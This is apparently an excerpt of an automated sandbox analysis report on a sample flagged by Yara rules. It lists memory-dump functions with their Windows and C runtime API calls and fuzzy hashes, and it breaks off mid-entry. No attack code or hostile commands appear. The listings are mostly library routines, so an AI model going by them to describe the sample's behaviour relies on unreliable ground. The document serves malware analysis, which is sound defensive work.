                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FindInstanceTargetType$Offset
                                                    • String ID:
                                                    • API String ID: 1467055271-0
                                                    • Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                    • Instruction ID: 64751833a2d3ad99ef7fd46b8063d82bd68a590db4cca5810e77224444bc0064
                                                    • Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
                                                    • Instruction Fuzzy Hash: 8B21F772A042059FFF34DF68DC49E6D7BA6FB85750B14861AE91193280E731E901CA98
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                    • String ID:
                                                    • API String ID: 1687354797-0
                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction ID: 610444a70ef3ac7f7b4ea625b5c3a15775df3a5b6107de331ee8b5d2b84420c3
                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction Fuzzy Hash: 64217E72C04208EADF55EBA9D844BDEBBF9AF89315F54401BE204B7280DB749A448A65
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,73A6BB93), ref: 00428DE8
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                    • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,73A6BB93), ref: 00428E61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,02519038,025169C9,02530907,00000008,02530C6C,?,?,?,?,02513CB2,?,?,0045A064), ref: 0251904F
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0251905D
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02519076
                                                    • SetLastError.KERNEL32(00000000,?,02519038,025169C9,02530907,00000008,02530C6C,?,?,?,?,02513CB2,?,?,0045A064), ref: 025190C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction ID: 0b40e98ec0f7aaa6e22df1ae0f7e3fafa047ee05b14c631fb2f8ebfa28087334
                                                    • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                    • Instruction Fuzzy Hash: 5601F73620A7126EB73927B4ECD8AB62B85FB45775B300339F530422E0EF128814898D
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                    • int.LIBCPMT ref: 00404D7A
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                    • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024F4FCA
                                                    • int.LIBCPMT ref: 024F4FE1
                                                      • Part of subcall function 024FBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024FBFD4
                                                      • Part of subcall function 024FBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024FBFEE
                                                    • std::locale::_Getfacet.LIBCPMT ref: 024F4FEA
                                                    • std::_Facet_Register.LIBCPMT ref: 024F501B
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024F5031
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024F504F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction ID: 50a5d381949d2cbe511a5bfb780b7ce9aa1188404771126ddeb57858d17b46a6
                                                    • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                    • Instruction Fuzzy Hash: 7411E0329002189FCB65EB64C844AAE7772BF84314F55011FE612AB2D0DB749A058FE4
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
                                                    • int.LIBCPMT ref: 0040C1B1
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
                                                    • std::_Facet_Register.LIBCPMT ref: 0040C1EB
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
                                                    • int.LIBCPMT ref: 004054FA
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                    • std::_Facet_Register.LIBCPMT ref: 00405534
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                    • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                    • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                    • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                    • int.LIBCPMT ref: 00405596
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                    • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                    • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                    • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                    • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                    • int.LIBCPMT ref: 00404C3C
                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                    • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                    • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024FC401
                                                    • int.LIBCPMT ref: 024FC418
                                                      • Part of subcall function 024FBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024FBFD4
                                                      • Part of subcall function 024FBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024FBFEE
                                                    • std::locale::_Getfacet.LIBCPMT ref: 024FC421
                                                    • std::_Facet_Register.LIBCPMT ref: 024FC452
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024FC468
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024FC486
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction ID: e6bf110944c53515d6fe22bfebda49fcc80054e3aef92ca47cb9525f088b6c3a
                                                    • Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
                                                    • Instruction Fuzzy Hash: 4C11CE72D00229ABCB55EBA4C884AEE7772AFC4754F14051BE611BB2E0DF748A01CFA4
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 024F4E8C
                                                    • int.LIBCPMT ref: 024F4EA3
                                                      • Part of subcall function 024FBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024FBFD4
                                                      • Part of subcall function 024FBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024FBFEE
                                                    • std::locale::_Getfacet.LIBCPMT ref: 024F4EAC
                                                    • std::_Facet_Register.LIBCPMT ref: 024F4EDD
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 024F4EF3
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024F4F11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                    • String ID:
                                                    • API String ID: 2243866535-0
                                                    • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction ID: 430b6f76fc2b0604ab3ad552e6ba946144cb142f7b15e970cc83c8c071858a33
                                                    • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                    • Instruction Fuzzy Hash: 7211CE329002299BCB55EBA4D844AEF7772BFC4324F14051AE611BB2E0EF749A01CFA4
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                    • __Getcoll.LIBCPMT ref: 00404EC4
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID: fJ@
                                                    • API String ID: 1836011271-3478227103
                                                    • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                    • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                    • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                    • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                    • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                    • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                    • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                    APIs
                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                    • String ID: pScheduler
                                                    • API String ID: 3657713681-923244539
                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                    • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog3_catchmake_shared
                                                    • String ID: MOC$RCC$v)D
                                                    • API String ID: 3472968176-3108830043
                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction ID: cf8df1994c6602344a145848d6d9f0ee244643d2b639149acdc7a34707f57e8a
                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                    • Instruction Fuzzy Hash: 0CF06272A00619DFEB17FF64C41066C3B65BF95B14F469491F440AF2E0CB789948CFA9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                    • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                    • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                    • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                    • Instruction ID: df6e2adaeb7e325d0fa7fa884241381e89b564d2df709859ae8b88b85cad1551
                                                    • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                    • Instruction Fuzzy Hash: 7671D6759002169BEF21CF59C884ABFBF7AFF4532CF56462AE41197180EB708D41CBA9
                                                    APIs
                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    • _free.LIBCMT ref: 00430B4F
                                                    • _free.LIBCMT ref: 00430B66
                                                    • _free.LIBCMT ref: 00430B85
                                                    • _free.LIBCMT ref: 00430BA0
                                                    • _free.LIBCMT ref: 00430BB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 3033488037-0
                                                    • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                    • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                    • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                    • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 3033488037-0
                                                    • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                    • Instruction ID: 7a4421f16dd7e1cd1bcb72926791fdd6410ab0b731024d328146ccbc78b88c48
                                                    • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                    • Instruction Fuzzy Hash: D251D431A02325AFDB20DF29C881B6A7BF5FF5A724F140569E809D72D0E735E905CB88
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction ID: 14c7d0057ae7f0c0b83c3a0d4a910a83d2130f7c96a52ce565a8ea3bdb05ca27
                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                    • Instruction Fuzzy Hash: 7A41D236A006149BCB14DF78C880B5EB7F6FF8A724B1585A9D905EB3C1D731E905CB88
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                    • __alloca_probe_16.LIBCMT ref: 00436922
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                    • __freea.LIBCMT ref: 0043698E
                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                    • String ID:
                                                    • API String ID: 313313983-0
                                                    • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                    • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                    • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                    • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                    APIs
                                                    • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                      • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
